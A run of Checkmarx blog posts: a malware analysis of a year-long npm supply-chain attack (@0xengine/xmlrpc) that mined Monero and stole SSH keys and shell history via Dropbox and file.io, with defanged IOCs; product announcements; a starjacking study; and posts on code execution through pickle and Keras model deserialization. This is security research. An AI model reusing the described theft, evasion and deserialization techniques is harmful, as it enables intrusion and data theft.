Checkmarx

Dozens of Machines Infected: Year-Long NPM Supply Chain Attack Combines Crypto Mining and Data Theft

Yehuda Gelb — Mon, 25 Nov 2024 12:00:44 +0000

Through our continuous monitoring of software supply chain threats, the Checkmarx Research team identified a supply chain attack that has remained active for over a year. The package, @0xengine/xmlrpc, began its life as a “legitimate” XML-RPC implementation in October 2023, but strategically transformed into a malicious tool in later versions and has remained active through November of 2024. This discovery serves as a stark reminder that a package’s longevity and consistent maintenance history do not guarantee its safety. Whether initially malicious packages or legitimate ones becoming compromised through updates, the software supply chain requires constant vigilance – both during initial vetting and throughout a package’s lifecycle.

Key Findings

A malicious NPM package masquerading as an XML-RPC implementation has maintained an unusually long presence on the NPM registry from October 2023 to November 2024, receiving 16 updates during this period.
The package started as a “legitimate” XML-RPC implementation and strategically introduced malicious code in later versions.
The malware steals sensitive data (SSH keys, bash history, etc..) every 12 hours while mining cryptocurrency on infected systems. Data is exfiltrated through Dropbox and file.io.
The attack achieved distribution through multiple vectors: direct NPM installation and as a hidden dependency in a legitimate-looking repository.
Evasion techniques include system monitoring detection and activity-based mining
At the time of investigation, it appeared that up to 68 compromised systems were actively mining cryptocurrency through the attacker’s Monero wallet.

Package History and Evolution

The malicious package “@0xengine/xmlrpc” first appeared on the NPM registry on October 2nd, 2023, presenting itself as a pure JavaScript XML-RPC server and client implementation for Node.js.

What makes this package particularly interesting is its strategic evolution from legitimate to malicious code. The initial release (version 1.3.2) and its immediate follow-up appeared to be legitimate implementations of XML-RPC functionality. However, starting from version 1.3.4, the package underwent a significant transformation with the introduction of malicious code in the form of heavily obfuscated code within the “validator.js” file.

Part of the obfuscated code

Over its year-long presence on NPM, the package has received 16 updates, with the latest version (1.3.18) published on October 4th, 2024. This consistent update pattern helped maintain an appearance of legitimate maintenance while concealing the malicious functionality.

Distribution Strategy

Our research uncovered a calculated supply chain attack involving two distribution vectors. The first involves direct installation of @0xengine/xmlrpc from NPM. The second, more sophisticated approach, involves a GitHub repository named “yawpp” (hxxps[:]//github[.]com/hpc20235/yawpp), which presents itself as a WordPress posting tool.

The yawpp repository appears legitimate, offering functionality for WordPress credential checking and content posting. It requires @0xengine/xmlrpc as a dependency, claiming to use it for XML-RPC communication with WordPress sites. This dependency is automatically installed when users set up the yawpp tool through standard npm installation.

This strategy is particularly effective as it exploits the trust developers place in package dependencies, potentially leading to inadvertent installation of the malicious package through what appears to be a legitimate project dependency.

The combination of regular updates, seemingly legitimate functionality, and strategic dependency placement has contributed to the package’s unusual longevity in the NPM ecosystem, far exceeding the typical lifespan of malicious packages that are often detected and removed within days.

Attack Flow

The attack orchestrated through @0xengine/xmlrpc operates through a sophisticated multi-stage approach that combines cryptocurrency mining with data exfiltration capabilities. The malicious functionality, concealed within validator.js, remains dormant until executed through one of two vectors:

Direct package users execute any command with the ‘–targets’ or ‘-t’ flag. This activation occurs when running the package’s validator functionality, which masquerades as an XML-RPC parameter validation feature.
Users installing the “yawpp” WordPress tool from GitHub automatically receive the malicious package as a dependency. The malware activates when running either of yawpp’s main scripts (checker.js or poster.js), as both require the ‘–targets’ parameter for normal operation.

This implementation ensures the malware activates through legitimate-looking tool usage, making detection more difficult.

Initial Compromise

Once triggered, the malware begins gathering system information:

Deobfuscated version of the system information gathering code

Following the initial data collection phase, the malware deploys its cryptocurrency mining component with a particular focus on Linux systems. The deployment process involves downloading additional payloads from a Codeberg repository disguised as system authentication services. The mining operation utilizes XMRig to mine Monero cryptocurrency, directing all mining rewards to a predetermined wallet address while connecting to the mining pool.

Deobfuscated configuration revealing the attacker’s Codeberg repository URLs used to fetch mining components

These downloaded components include:

XMRig: The actual cryptocurrency mining software
xprintidle: Used to detect user activity
Xsession.sh: The main script that orchestrates the mining operation

The mining operation is configured with specific parameters targeting Monero:

Monero mining configuration found in the downloaded Xsession.sh script

At the time of our investigation, we observed 68 miners actively connected to this wallet address through the hashvault.pro mining pool, indicating a possible significant number of compromised systems actively mining cryptocurrency for the attacker.

Sophisticated Evasion Mechanisms

The malware implements an advanced process monitoring system to avoid detection. It maintains a list of monitoring tools and continuously checks for their presence.

Deobfuscated version of the process monitoring evasion logic found in Xsession.sh – checks for and terminates mining when system monitoring tools are detected

The malware also carefully monitors user activity through the xprintidle utility. It only initiates mining operations after a specified period of inactivity (default: 1 minute) and immediately suspends operations when user activity is detected. This behavior is controlled by the INACTIVITY_IN_MINS parameter.

Maintaining Persistence

To ensure long-term survival on infected systems, the malware establishes persistence through systemd, disguising itself as a legitimate session authentication service named “Xsession.auth”. This service is configured to automatically start with the system, ensuring the mining operation resumes after system reboots. The malware also implements a daily check-in mechanism, regularly sending system status updates and potentially receiving new commands or configurations.

Deobfuscated systemd service configuration from Xsession.sh used for maintaining persistence

Data Exfiltration Pipeline

The malware implements a comprehensive data collection and exfiltration system that operates continuously. Every 12 hours, it performs a systematic collection of sensitive system information through a “daily_tasks” function found in Xsession.sh:

During each collection cycle, the malware systematically gathers a wide range of sensitive data including:

SSH keys and configurations from ~/.ssh
Command history from ~/.bash_history
System information and configurations
Environment variables and user data
Network and IP information through ipinfo.io

The stolen data is exfiltrated through two channels. One, using the Dropbox API with hardcoded credentials.

Additionally, the malware employs file.io as a secondary exfiltration channel, using a bearer token for authentication and setting automatic file deletion after download to minimize detection risks.

Conclusion

This year-long campaign serves as a stark reminder of the critical importance of thoroughly vetting open-source projects before incorporation into any software development process. Projects can be malicious from the start, maintaining a long-term presence while hiding their true nature, or legitimate projects can later become compromised and introduce malicious code through updates.

This dual threat emphasizes why developers and organizations must remain vigilant not only during initial vetting but also in monitoring package updates, implementing robust security measures, and conducting regular audits of their dependencies to mitigate the risks associated with supply chain attacks.

As part of the Checkmarx Supply Chain Security solution, our research team continuously monitors suspicious activities in the open-source software ecosystem. We track and flag “signals” that may indicate foul play, including suspicious entry points, and promptly alert our customers to help protect them from potential threats.

Checkmarx One customers are protected from this attack.

Packages

@0xengine/xmlrpc

IOC

hxxps[:]//codeberg[.]org/k0rn66/xmrdropper/raw/branch/master/xprintidle
hxxps[:]//codeberg[.]org/k0rn66/xmrdropper/raw/branch/master/xmrig
hxxps[:]//codeberg[.]org/k0rn66/xmrdropper/raw/branch/master/Xsession.sh
Wallet Address: 45J3v3ooxT335ENFjJBB3s7WS7xGekEKiBW4Z6sRSTUa5Kbn8fbqwgC47SLUDdKsri7haj7PBi5Wvf3xLmrX9CEZ3MGEVJU

Tailoring Queries: Azure Open AI and Checkmarx in Action

Avi Hein — Mon, 25 Nov 2024 08:03:36 +0000

Last year we launched AI Query Builder for SAST. It’s now improved and it’s even more secure.

Introducing Enhanced Security and Customization with Azure OpenAI

We are excited to announce that AI Query Builder is now integrated into Azure OpenAI.

This update provides our customers with Microsoft Azure’s top-tier security capabilities while also enabling the use of OpenAI’s advanced models. Our new infrastructure ensures that the code snippet is routed through a managed Checkmarx gateway to a secure and supported AI system.

This is truly the best of both worlds.

Why Azure OpenAI?

By using Azure OpenAI, users get the following benefits:

Security: Azure OpenAI leverages Microsoft Azure’s security features, ensuring a fortified environment for AI-powered applications. It also ensures network isolation and robust security measures, safeguarding sensitive data and maintaining high standards of data protection. This means that Azure OpenAI Service is fully controlled by Microsoft. Microsoft hosts the OpenAI models in Microsoft’s Azure environment and the Service does NOT interact with any services operated by OpenAI (e.g. ChatGPT, or the OpenAI API) and therefore is not used to improve OpenAI models or any Microsoft or third-party products and services.

Enterprise focus: Specifically tailored for business needs, it offers advanced conversational AI capabilities to facilitate more efficient and effective interactions.

What are the benefits of its integration with Checkmarx?

Managed security gateway: All AI queries are routed through a managed Checkmarx gateway. Our new infrastructure routes through a managed Checkmarx gateway before connecting to Azure AI. This extra layer of security ensures future services and model updates.

Future security services: This new setup paves the way for additional and future security services, ensuring our customers benefit from any new services and advancements.

Seamless access to AI benefits: The integration allows for seamless access to AI model changes without compromising on security.

Checkmarx AI Query Builder: Making Custom Queries Accessible

The Checkmarx AI Query Builder for SAST enables users to harness AI to automatically generate new custom queries or modify existing ones. This simplifies the process of tailoring the SAST solution to specific application needs.

“AI Query Builder builds on the custom query capability, allowing AI to help any AppSec team write new or edit existing custom queries. This allows every organization to tune SAST more easily for your applications, increasing accuracy and minimizing false positives and false negatives. AI Query Builder is an expert in the ins and outs of CxQL. You no longer need to be an expert in building a query when an AI can do the work for you! With this feature, a simple prompt such as, “Help me generate a Checkmarx query that will detect an authentication issue,” will immediately generate a new custom query.” 

The AI Query Builder has also gotten a UI refresh, along with the rest of the Query Editor and the Checkmarx One platform, further improving the user experience.

Why use AI to write queries?

Enhanced efficiency: Saves time and effort by allowing developers to generate tailored queries quickly, reducing the manual workload involved in query development.

Start now: CxQL is a proprietary query language. While it’s easy to learn, by using AI, developers can get started immediately without taking the time to learn a new language.

User-friendly: This tool enables all Checkmarx One users to finetune their SAST solution without needing expert query writing knowledge. Simply provide a prompt and the AI will generate a custom query tailored specifically to your needs.

Get Started Today

Still not on Checkmarx One? Contact us to discuss how to get Checkmarx One and take advantage of AI Query Builder today.

Introducing the Checkmarx One Query Editor

Avi Hein — Mon, 25 Nov 2024 08:03:34 +0000

Accuracy and Flexibility in SAST

One of the big challenges of Static Application Security Testing (SAST) has long been accuracy. All SAST solutions struggle with accuracy, generating either false positives (unfounded alerts) or false negatives (missed vulnerabilities). This will always be a concern, so choosing the best SAST solution boils down to measuring accuracy.

At Checkmarx, our SAST tools improve accuracy. Our SAST solution uses queries to facilitate search customization and provide an adaptive scanning engine, real time scanning, AI tools, and auto-remediation.

What Are Queries and Why Are They Important?

Queries are the secret sauce of SAST scans. What exactly is a query? A query is a vulnerability rule. All SAST engines use queries to find vulnerabilities and achieve greater fidelity.

“Queries are building blocks for identifying potential vulnerabilities and critical for filtering through the noise to avoid sending false positives and false negatives to your developers. Understanding queries enables AppSec teams and developers to prioritize your efforts, and promptly address the most critical issues.”

All SAST engines use queries to find vulnerabilities. However, most SAST solutions don’t let you customize the rules or modify queries. In those cases, users are chained to the vulnerabilities that the solution chooses to look for. The lack of customization leads to more false positives or missed vulnerabilities.

Checkmarx SAST is the only solution that provides the flexibility to customize queries, resulting in lower false positives without creating false negatives for more accurate results.

“Checkmarx SAST includes pre-built queries (and presets) written in the Checkmarx Query Language (CxQL). These identify common security issues such as SQL injection, cross-site scripting, and insecure access controls, providing an easier way to start securing applications out of the box.”

See how queries work.

Tailored Presets & Custom Queries

Checkmarx SAST empowers you to customize queries according to your specific needs. As we described in a previous post:

A common use case that neatly highlights the benefits of customizing queries can be found in cross-site scripting (XSS) vulnerability findings where a false positive may be occurring due to the use of an in-house sanitizer method that is not included in the Checkmarx One default out-of-the-box query. We can simply add this method to the appropriate CxQL query and rescan the project to remove the FP.

Introducing the Improved Checkmarx Query Editor

Long time Checkmarx users are probably familiar with CxAudit, our query editor for CxSAST. Our updated Checkmarx Query Editor brings features of CxAudit that were previously missing to Checkmarx One! Built with customer experience in mind, this powerful tool is designed to make query editing even easier.

What’s New

Our updated Query Editor focuses on enhancing usability and improving workflow efficiency. Here’s a closer look at what’s new:

Friendly and intuitive user interface – We’ve revamped the look and feel of the Query Editor, making it easier to navigate and understand and intuitive to use. The design is modular, allowing users to customize their workspace to suit their needs. You can focus on specific elements or get a broader view of your project. This flexibility ensures that you can work in a way that’s most comfortable for you.

Language-specific query view (Edit mode) – Navigating through projects to find specific queries can be time-consuming. That’s why we’ve introduced a language-specific view. Now, you can select a programming language and instantly access all queries related to that language across all projects. This eliminates the need to search through each project individually, saving you valuable time.

Hide empty queries– To further streamline your workflow, we’ve added a new mode that hides empty queries. This removes any queries that didn’t return results. This will help to declutter your workspace and let you concentrate on the queries that need your attention.

Scan history – Understanding the history of your scans is crucial for tracking progress. Our new scan history feature provides a comprehensive log of past scans. You can easily review past scans, compare results, and identify patterns that inform future decisions.

How to Access and Use It

Query Editor is accessible and seamlessly integrated into Checkmarx One. Simply navigate to the queries section and start! You can open the Query Editor associated with a project or open it independent of any project. Get the full documentation here.

Get Started Today

The new Checkmarx One Query Editor simplifies the process of customizing security scans. With an intuitive interface and features like language-specific views and scan history, it helps you prioritize your focus. By reducing false positives and negatives, the Query Editor helps your complete your work and secure your applications more efficiently. Start using the Checkmarx Query Editor today and enhance your application security with ease and precision.

Still not on Checkmarx One? Contact us to discuss how to migrate from CxSAST or another vendor to Checkmarx One today.

“Free Hugs” – What to be Wary of in Hugging Face – Part 2

Dor Tumarkin — Thu, 21 Nov 2024 12:00:48 +0000

Enjoy Threat Modeling? Try Threats in Models!

Previously…
In part 1 of this 4-part blog, we discussed Hugging Face, the potentially dangerous trust relationship between Hugging Face users and the ReadMe file, exploiting users who trust ReadMe and provided a glimpse into methods of attacking users via malicious models.
In part 2, we explore dangerous model protocols more in-depth– going into the technical reasons as to why exactly are models running code.

Introduction to Model Serialization

A model is a program that was trained on vast datasets to either recognize or generate content based on statistical conclusions derived from those datasets.
To oversimplify, they’re just data results of statistics. However, do not be misled – models are code, not plain data. This is often stressed in everything ML, particularly in the context of security. Without going into too much detail – it is inherent for many models to require logic and functionality which is custom or specific, rather than just statistical data.
Historically (and unfortunately) that requirement for writable and transmittable logic encouraged ML developers to use complex object serialization as a means of model storage – in this case types of serialization which could pack code. The quickest solution to this problem is the notoriously dangerous pickle, used by PyTorch to store entire Torch objects, or its more contextual and less volatile cousin marshal, used by TensorFlow’s lambda layer to store lambda code.

Please stop using this protocol for things. Please.

While simple serialization involves data (numbers, strings, bytes, structs), more complex serialization can contain objects, functions and even code – and that significantly raises the risk of something malicious lurking inside the models.

Writing’s on the wall there, guys

Protecting these dangerous deserializers while still using them is quite a task. For now, let’s focus on exploitation. This is quite well documented at this point, though there have been some curious downgrades exposed during this research.

Exploiting PyTorch

PyTorch is a popular machine learning library – extremely popular on Hugging Face andthe backbone of many ML frameworks supported on HF. We’ll have more on those (and how to exploit them) in a future blog.
PyTorch relies on pickling to save its output, which can contain an arbitrary method with arbitrary variables invoked upon deserialization with the load function; this works the same for PyTorch:

If this looks identical to the previous Pickle example to you then that’s because it is.

Note that the source code for BadTorch doesn’t need to be in scope – the value of __reduce__ is packed into the pickle, and its contents will execute on any pickle.load action.
To combat this, PyTorch added a weights_only flag. This flag detects anything outside of a very small allowlist as malicious and rejects it, severely limiting if not blocking exploitation. It is used internally by Hugging Face’s transformers, which explains why it can safely load torches even when dangerous and starting version 2.4 This flag is encouraged via a warning where it is stated that in the future this will be a default behavior.

At the time of writing, PyTorch does not yet enable weights_only mode by default. Seeing how the rampant use of torch.load in various technologies is (this will be discussed in part 3), it would be safer to believe this change when we see it, because it is likely to be a breaking change. It would then be up to the maintainers whose code this change breaks to either adapt to this change or disable this security feature.

TensorFlow to Code Execution

TensorFlow, is a different machine learning library that offers various ways to serialize objects as well.
Of particular interest to us are serialized TensorFlow objects in protocols that may contain serialized lambda code. Since lambdas are code, they get executed after being unmarshled from Keras’, being a high-level interface library for TensorFlow.
Newer versions of TensorFlow do not generate files in the older Keras format (TF1, which uses several protobuf files or as h5).
To observe this, we can look at the older TensorFlow to 2.15.0, which allows generating a model that would be loaded using the malicious code (credit to Splinter0 for this particular exploit):

Note that the functionality to serialize lambdas has been removed in later versions of the protocol. For Keras, which supports Lambdas, these are now relying on annotations to link lambdas to your own code, removing arbitrary code from the process.
This could have been a great change if it eliminated support for the old dangerous formats, but it does not – it only removes serialization (which creates the payload) but not execution after deserialization (which consumes it).
Simply put – just see for yourself: if you generate a payload like the above model in an h5 format using the dangerous tensorflow 2.15.0, and then update your tensorflow:

Exploit created on tensorflow 2.15.0, exploit pops like a champ on 2.18.0

In other words – this is still exploitable. It’s not really a Keras vulnerability (in the same vein torch.load “isn’t vulnerable”), though, but rather it’s a matter of how you end up using it – we’ve disclosed it amongst several other things to Hugging Face in August 2024, but more on that in a later write-up.

SafeTensors

Currently, Hugging Face is transferring models from a pickle format to SafeTensors, which use a more secure deserialization protocol that is not as naïve (but not as robust) as pickles.

SafeTensors simply use a completely different language (Rust) and a much simpler serialization protocol (Serde), which requires customization for any sort of automatic behavior post-deserialization.

Moving from Torch to SafeTensors

However, there is a fly in the SafeTensors ointment – importing. It makes sense that the only way to import from another format is to open it using legacy libraries, but it’s also another vulnerable way to invoke Torches. convert.py, a part of the SafeTensors library intended to convert torches to the SafeTensors format. However, the conversion itself is simply a wrapper for torch.load:
https://github.com/huggingface/safetensors/blob/main/bindings/python/convert.py#L186
The HF Devs are aware of this and have added a prompt – but that can be bypassed with a -y flag:

Model will run whoami on conversion. Disclaimer: image manipulated to exclude a bunch of passive warnings that might warn you, right after it’s way too late

The problem here is the very low trust barrier to cross – since, as discussed, most configuration is derived from ReadMe commands. This flag can simply be hidden between other values in instructions, which makes convert.py not just a conversion tool but also another vector to look out for.

There are many more conversion scripts in the transformers library that still contain dangerous calls to torch.load and can be found on the Transformers’ Github.

Conclusion

It’s interesting to see how what’s old is new again. Old serialization protocols which are easier to implement and use, are making a comeback through new, complex technology – particularly when security was never a concern during experimentation, and again becoming deeply ingrained in relatively new technology. The price for that speed is still being paid, with the entire ecosystem struggling to pivot to a secure and viable service by slugging through this tech debt.

There are several recommendations to be made when judging models by their format:

With serialization mechanisms baked into the ecosystem, you should avoid the legacy ones, and review those that are middle-of-the-way and historically vulnerable.
Consider a transition to SafeTensor or other protocols that are identified as secure and do not execute code or functions on deserialization and reject older potentially dangerous protocols.
- BUT never trust conversion tools to safely defuse suspicious models (without reviewing them first).
And – as always – make sure you trust the maintainer of the Model.

On The Next Episode…

Now that we’ve discussed a couple of vulnerable protocols, we’ll demonstrate how they can be exploited in practice against Hugging Face integrated libraries.

Checkmarx Advances Software Supply Chain Security

Joel Rosenstein — Tue, 19 Nov 2024 16:05:25 +0000

Software supply chain security (SSCS) attacks are on the rise.

In fact, according to Infoworld, “we are in the midst of a rapid surge in software supply chain attacks,” with a staggering 742% annual increase, resulting in costs exceeding $4 million. Gartner predicted that by 2025, 45% of organizations worldwide will have experienced attacks on their software supply chains, a three-fold increase from 2021.

The growing number of high-profile SSCS attacks and data breaches (such as SolarWinds, NotPetya, CCleaner, Target, Equifax and Kaseya VSA) have increased awareness of SSCS vulnerabilities. This alarming trend emphasizes the need for enterprises to allocate more resources into securing their software development and deployment processes, from code to cloud.

But how did we get here? Fifteen years ago, most enterprises exclusively relied on internally developed code. Today, however, most modern code bases are largely built with open source packages and third-party code. While this shift accelerates development and fosters more innovative code, it also introduces more vulnerabilities – whether from human error, careless exposure of secret keys (passwords, encryption keys, and access tokens), or malicious third-party code. Additionally, the recent uptick in AI-generated code from digital assistants like ChatGPT, GitHub Copilot, and Codestral has further increased the risk of insecure code finding its way into enterprise applications.

Like it or not, modern development requires the use of third-party codebases, despite the risks they may bring. That’s why enterprises need a solution to effectively manage and mitigate the risks associated with these third-party libraries.

AppSec Has Traditionally Focused on Internally Developed Code

Figure 1 – Traditional application security focused only on finding vulnerabilities in proprietary code.

Until recently, application security (AppSec) primarily focused on the code developed by the enterprise in-house. This made it easier to detect and remediate security vulnerabilities, because the code was exclusively written by their own developers. Vulnerability detection for these code bases generally relied on static application security testing (SAST) and dynamic application security testing (DAST).

In fact, when Checkmarx was founded 18 years ago, we also focused on this traditional AppSec model, concentrating on securing the code developed internally by enterprises.

Why Software Supply Chain Security Now?

What changed? In recent years, the importance of securing the software supply chain from code to cloud has grown steadily among enterprise CISOs, AppSec managers, DevOps teams, and developers.

This shift is driven by four key factors:

Extensive use of open source packages and other third-party code
Migration of applications to the cloud (cloud-native applications)
Incorporation of automated compile/deploy workflows (CI/CD)
Proliferation of attacks on the software supply chain

These changes in modern development have introduced greater risks to software security than ever before. Securing applications now requires involvement from every stage of the software development lifecycle (SDLC), from code to cloud. To address these new threat vectors, Checkmarx developed a comprehensive, integrated solution that protects the entire software supply chain.

SSCS Begins With SCA and Malicious Package Protection

Surveys indicate a dramatic increase in the use of open source libraries, with up to 97% of applications now incorporating open source code. This statistic is not surprising, considering how open source libraries significantly speed up development and reduce business costs.

However, this new, increased use of open source code has also exposed enterprises to a massive new threat vector: both unintentional vulnerabilities and intentionally malicious code – both of which can be exploited.

Checkmarx has adapted to the evolving risks in the software supply chain and has become a leader in addressing these open source risks. How? Our Software Composition Analysis (SCA) solution provides enterprises with a strong protection against these types of malicious packages. Checkmarx’ SCA solution:

Comprehensively discovers and itemizes all open source packages used in applications (including transitive open source dependencies)
Identifies open source packages containing vulnerable code, malicious code, or suspicious behavior (such as typosquatting, starjacking, and repojacking)
Prioritizes remediation efforts using multiple analyses (e.g., reachability/exploitable path analysis and SAST correlation)
Provides AppSec teams and developers with specific and actionable remediation guidance
Integrates with CI/CD and IDE tools to smoothly integrate security testing and remediation workflows into existing deployment and development platforms
Generates an industry-standard software bill of materials (SBOM)
Detects legal and compliance risks associated with open source licensing issues
Enforces policy rules to automatically send alerts and prevent builds based on a range of factors

Figure 2 – The first step to expanding application security into software supply chain security is adding advanced SCA with malicious package protection.

Checkmarx One: Advanced AppSec Including SSCS

Unfortunately, even advanced SCA solutions are no longer enough to protect against SSCS attacks. To fully protect the software supply chain, Checkmarx now offers a complete suite of industry-leading solutions to secure both internally developed code and the software supply chain components that they consume.

Checkmarx One is a code- to -cloud platform that provides an integrated SSCS solution that no enterprise can afford to be without. In addition to our SAST, DAST, SCA, and malicious package protection capabilities, Checkmarx One covers the entire software supply chain with the following capabilities:

Container Security – Identify and mitigate risks in container images, container infrastructure, and runtime code.
AI Security – Automatically scan AI-generated source code and referenced open source libraries for vulnerable or malicious code.
IaC Security – Secure cloud infrastructure with proactive vulnerability identification and misconfiguration detection.
API Security – Discover and remediate every API vulnerability.
Secrets Detection – Automatically discover the presence of sensitive credentials.
Repository Health – Get comprehensive health scorecards for software repositories.

Figure 3 – Checkmarx One delivers comprehensive code-to-cloud application security, including coverage for critical software supply chain dangers.

More About Our Newest Capabilities

Secrets Detection and Repository Health are the newest additions to the Checkmarx One suite aimed at protecting against software supply chain risks. Let’s take a closer look at these new offerings:

Secrets Detection

Figure 4 – Secrets Detection minimizes risk by identifying sensitive credentials that are at risk of being unintentionally exposed.

Enterprises unintentionally expose thousands of secret credentials in GitHub and other publicly accessible or insecure locations every day. This exposure can enable unauthorized access to your systems, potentially resulting in cyber-attacks, financial loss, and reputational damage. Once credentials are compromised, attackers can move laterally within systems to extract data, deploy malware, or launch further attacks on infrastructure, customers, and partners.

Checkmarx’ Secrets Detection minimizes risk by quickly identifying sensitive credentials that may be unintentionally exposed – and pinpoints which ones are still valid. With this insight, your development and security teams can quickly remediate issues by removing exposed secrets and updating them to prevent any unauthorized usage.

Scanning for exposed secrets can be initiated on demand or manually with automatic triggers via SCM integration (e.g., pull request, build). Discovered secrets are automatically validated to determine if they are still in effect and thus potentially exploitable.

This provides three key benefits:

Minimize supply chain risk by preventing the exposure of secret credentials, reducing the chance of attackers accessing your systems or stealing data.
Improve regulatory compliance by meeting data protection requirements (e.g., GDPR, HIPAA, PCI DSS, SOX, FISMA, CCPA) and avoiding fines and reputational damage.
Increase developer efficiency by allowing developers to initiate scans, review discovered secrets, and receive remediation guidance directly within their IDE.

Repository Health

Figure 5 – Repository Health provides ongoing visibility into the security and maintenance health of the code repositories used in enterprise applications.

Enterprises also need a reliable way to continuously evaluate the riskiness of the open source code used in their applications, as well as a method to monitor the quality and security of the repositories containing their internally written code.

Checkmarx’ Repository Health maximizes the security posture of your software supply chain by continuously tracking health scores for all repositories in your applications. Scoring is based on more than a dozen key factors in areas, such as code quality, dependency management, CI/CD best practices, and project maintenance.

Repository Health can automatically scan repositories upon repository updates, ensuring up-to-date repo health metrics with no manual effort. Developers and security teams can also run on-demand repo health scans at any time via API, CLI, or the Checkmarx One UI.

Additionally, repository health scores are included in Checkmarx One reports, providing visibility into – and efficient prioritization of – security vulnerabilities, code quality issues, and repository health risks, all in one place.

The three key benefits this provides include:

Minimize supply chain risk – Visibility into the security health of open source components and your own code repositories that closes an important gap in software supply chain security.
Efficient holistic risk prioritization – Identifying and prioritizing high-risk areas across the software supply chain that allows developers and security teams to focus their efforts on the most critical security issues.
Enhanced transparency and communication – Clear, quantifiable metrics on the security posture of open source dependencies and first-party repositories that improve transparency and communication among stakeholders.

Learn More

Given the wide range of threat vectors facing enterprise applications and the software supply chain, deploying the most comprehensive and effective security solutions is essential. And these solutions must also cultivate an excellent developer experience to encourage adoption and support seamless, efficient workflows.

Relying on a hodge-podge of different tools to protect your supply chain is no longer viable – it is expensive, inefficient, and difficult to maintain. To protect your enterprise from data breaches or other system infiltrations unified platform that covers all your bases. And that’s where Checkmarx comes in.

Contact us for a free demo of Checkmarx One and discover the industry’s best solution for securing your enterprise’s applications and the software supply chain.

Falling Stars

Eugene Rojavski — Mon, 18 Nov 2024 14:39:23 +0000

Intro

The number of the open-source packages is constantly rising, complicating how developers choose a package that fits their needs and is secure. Package repositories offer various metrics to help developers choose the right package, like the number of downloads, GitHub statistics, and user ratings. Package repositories offer various metrics to help developers choose the right package, like the number of downloads, GitHub statistics, and user ratings. Nevertheless, popularity continues to be one of the most influential factors in package selection. When we see a popular package, we assume it’s well-maintained and reliable. This common assumption led to the emergence of starjacking two years ago.

Starjacking is a technique that artificially inflates a package’s apparent popularity by exploiting how package repositories display information about associated GitHub repositories. After the technique became public, several major repositories, including npm and Yarn, were found to allow package publications with links to GitHub repositories not owned by the package publisher. We recently conducted comprehensive research across more than 20 package repositories to evaluate the current state of starjacking, and the findings show promising developments in security measures.

Researched package repositories

Our research encompassed 21 separate package repositories, Ranging from the big ones like npm, maven, and PyPI to smaller ones like CPAN, LuaRocks, and Hackage. The table below lists each repository and its primary programming language, included in the research.

Repo Name	Language
npm	JS
Maven Central	java
Pypi	python
NuGet	csharp
pkg.go.dev	go
Packagist	PHP
Rubygems	Ruby
crates.io	Rust
CocoaPods	ObjC/Swift
Pub.dev	dart
CPAN	perl
CRAN	R
Clojars	JS
Yarn	JS
anaconda	python, r
LuaRocks	lua
Hackage	haskell
Opam	ocaml
Hex	erlang
Meteor	JS
Swift package index	Swift

These repositories fall into two primary categories based on their artifact management approaches:

Some store the artifacts created during building, compiling, or packaging the code.

Others simply provide references to GitHub repositories containing the necessary files for package installation.

Package managers that exclusively reference GitHub repositories, such as pkg.go.dev and RubyGems, are inherently protected against starjacking since they display data directly from GitHub repositories. This direct integration eliminates the possibility of linking to one repository while serving code from another.

While such package repositories are not susceptible to Starjacking, the displayed GitHub statistics can still be misleading. They can be manipulated using more sophisticated techniques. For example, Swift Package Index and Packagist display comprehensive GitHub repository details, which can trick the users, if the stats are spoofed.

Results

Most repositories do not display the GitHub repository statistics referred to by the package. While PyPI and Yarn previously showed these stats, they’ve since modified their approaches: Yarn has completely removed the statistics while PyPI implemented a more sophisticated metadata display system. Yet some package repos still display GitHub statistics; for example, npm continues to show the number of issues and pull requests from the GitHub repository specified in the package metadata.

Moreover, the CPAN Perl package repository displays the GitHub stats.

Pypi’s Transformation of GitHub Statistics Display

PyPI slowly but steadily added verification of the package metadata.

Initially, PyPI displayed GitHub repository statistics without any verification mechanism. This approach made the platform vulnerable to starjacking attempts, as any package could claim association with any GitHub repository. PyPI’s first security improvement divided package information into two distinct sections: unverified and verified details.

While this division helped users identify trusted information, statistics of arbitrary GitHub repositories were still shown in the unverified details section. This was a good step towards informing the user which data they can trust. However, this was not enough since most people don’t carefully distinguish between verified and unverified information.

PyPI made a crucial advancement by implementing a comprehensive verification system through the Trusted Publisher Management feature. Starting from August 2024, the platform now ensures GitHub statistics appear exclusively in the verified details section and are only displayed for packages uploaded through the Trusted Publisher Management feature. This system utilizes OpenID Connect to enable secure publishing through trusted services like GitHub Actions.

The new publishing process works as follows: A PyPI project maintainer specifies a workflow in their GitHub repository for automatic package publishing. When triggered, the workflow authenticates with PyPI, proving that the code comes from the intended source. Only after verification can the package be published. Under this new system, PyPI displays GitHub repository statistics only when the links point to verified code repositories that have been authenticated through the trusted publishing workflow.

The evolution of PyPI’s security measures against Starjacking can be seen in three distinct phases (left to right):

Initial phase: GitHub statistics were displayed without any verification or indication of their authenticity.

2. Second phase: Separation of verified and unverified details, with GitHub statistics specifically placed
in the unverified details section.

3. Current phase: GitHub statistics are now only displayed in the verified details section and appear
exclusively for packages uploaded through the Trusted Publisher Management feature.

This progression demonstrates PyPI’s commitment to maintaining security while providing valuable repository information to users.

Conclusion

While npm and CPAN continue to display unverified GitHub statistics, the risk of Starjacking has significantly decreased over the past two years. This improvement stems from most repositories either removing GitHub statistics entirely or implementing more robust verification systems, as exemplified by PyPI. It’s worth noting that most repositories (with PyPI being the exception) still display package metadata links without verification. While this vulnerability could potentially be exploited by malicious actors, it poses a substantially lower risk of misleading users compared to the original Starjacking technique.

“Free Hugs” – What To Be Wary of in Hugging Face – Part 1

Dor Tumarkin — Thu, 14 Nov 2024 12:00:00 +0000

Introduction

GenAI has taken the world by storm. To meet the needs for development of LLM/GenAI technology through open-source, various vendors have risen to meet the need to spread this technology.

One well-known platform is Hugging Face – an open-source platform that hosts GenAI models. It is not unlike GitHub in many ways – it’s used for serving content (such as models, datasets and code), version control, issue tracking, discussions and more. It also allows running GenAI-driven apps in online sandboxes. It’s very comprehensive and at this point a mature platform chock full of GenAI content, from text to media.

In this series of blog posts, we will explore the various potential risks present in the Hugging Face ecosystem.

Championing logo design Don’ts (sorry not sorry opinions my own)

Hugging Face Toolbox and Its Risks

